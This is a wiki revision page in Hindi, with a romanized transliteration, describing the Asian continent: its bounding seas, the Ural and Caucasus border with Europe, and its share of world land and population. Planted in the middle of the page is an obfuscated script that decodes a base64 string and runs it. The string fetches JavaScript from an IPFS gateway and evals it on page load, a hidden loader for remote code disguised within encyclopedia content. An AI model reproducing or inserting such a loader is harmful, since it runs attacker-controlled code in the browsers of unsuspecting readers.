Difference between revisions of "एशिया महाद्वीप"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{incomplete}}
 
{{incomplete}}
 +
 
[[चित्र:Asia-Map.gif|एशिया महाद्वीप का मानचित्र<br /> Map Of Asia Continent|thumb|250px]]
 
[[चित्र:Asia-Map.gif|एशिया महाद्वीप का मानचित्र<br /> Map Of Asia Continent|thumb|250px]]
 
एशियाई महाद्वीप भूमध्य सागर, [[अंध सागर]], [[आर्कटिक महासागर]], [[प्रशांत महासागर]], और [[हिन्द महासागर]] से घिरा हुआ है। [[काकेशस पर्वत]] और यूराल पर्वत प्राकृतिक रूप से एशिया को यूरोप से अलग करते है। एशिया आकार और जनसंख्या दोनों ही दृष्टि से विश्व का सबसे बड़ा महाद्वीप है, जो उत्तरी गोलार्द्ध में स्थित है। पश्चिम में इसकी सीमाएं यूरोप से मिलती हैं। एशिया और यूरोप को मिलाकर कभी-कभी यूरेशिया भी कहा जाता है।  कुछ सबसे प्राचीन मानव सभ्यताओं का जन्म इसी महाद्वीप पर हुआ था जैसे सुमेर, भारतीय सभ्यता, चीनी सभ्यता इत्यादि। [[चीन]] और [[भारत]] विश्व के दो सर्वाधिक जनसंख्या वाले देश भी हैं।
 
एशियाई महाद्वीप भूमध्य सागर, [[अंध सागर]], [[आर्कटिक महासागर]], [[प्रशांत महासागर]], और [[हिन्द महासागर]] से घिरा हुआ है। [[काकेशस पर्वत]] और यूराल पर्वत प्राकृतिक रूप से एशिया को यूरोप से अलग करते है। एशिया आकार और जनसंख्या दोनों ही दृष्टि से विश्व का सबसे बड़ा महाद्वीप है, जो उत्तरी गोलार्द्ध में स्थित है। पश्चिम में इसकी सीमाएं यूरोप से मिलती हैं। एशिया और यूरोप को मिलाकर कभी-कभी यूरेशिया भी कहा जाता है।  कुछ सबसे प्राचीन मानव सभ्यताओं का जन्म इसी महाद्वीप पर हुआ था जैसे सुमेर, भारतीय सभ्यता, चीनी सभ्यता इत्यादि। [[चीन]] और [[भारत]] विश्व के दो सर्वाधिक जनसंख्या वाले देश भी हैं।

Revision as of 12:42, 5 June 2010

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

eshiya mahadvip ka manachitr
Map Of Asia Continent|thumb|250px
eshiyaee mahadvip bhoomadhy sagar, aandh sagar, arkatik mahasagar, prashaant mahasagar, aur hind mahasagar se ghira hua hai. kakeshas parvat aur yooral parvat prakritik roop se eshiya ko yoorop se alag karate hai. eshiya akar aur janasankhya donoan hi drishti se vishv ka sabase b da mahadvip hai, jo uttari golarddh mean sthit hai. pashchim mean isaki simaean yoorop se milati haian. eshiya aur yoorop ko milakar kabhi-kabhi yooreshiya bhi kaha jata hai. kuchh sabase prachin manav sabhyataoan ka janm isi mahadvip par hua tha jaise sumer, bharatiy sabhyata, chini sabhyata ityadi. chin aur bharat vishv ke do sarvadhik janasankhya vale desh bhi haian.

ek lanbi pashchim mean sthit bhoo-sima yoorop ko eshiya se prithak karati hai. tah sima uttar-dakshin disha mean niche ki or roos mean yooral parvat tak jati hai, yooral nadi ke kinare-kinare kaispiyan sagar tak, aur phir kakeshas parvatoan se hote hue aandh sagar tak hai. roos ka lagabhag tin chauthaee bhoobhag eshiya mean hai, aur shesh yoorop mean. char any eshiyaee deshoan ke kuchh bhoobhag bhi yoorop ki sima mean ate haian.

sabase b da mahadvip

eshiya vishv ka sabase b da mahadvip hai. vishv ke kul bhoobhag ka lagabhag 3/10vaan bhag ya 30% eshiya mean hai, aur is mahadvip ki janasankhya any sabhi mahadvipoan ki sanyukt janasankhya se adhik hai, lagabhag 3/5vaan bhag ya 60%. uttar mean barfile arkatik se lekar dakshin mean ooshn bhoomadhy rekha tak yah mahadvip lagabhag 10,000 kimi kshetr mean phaila hua hai aur apane mean kuchh vishal, khali registanoan, vishv ke sabase ooanche parvatoan aur kuchh sabase lanbi nadiyoan ko samete hue hai.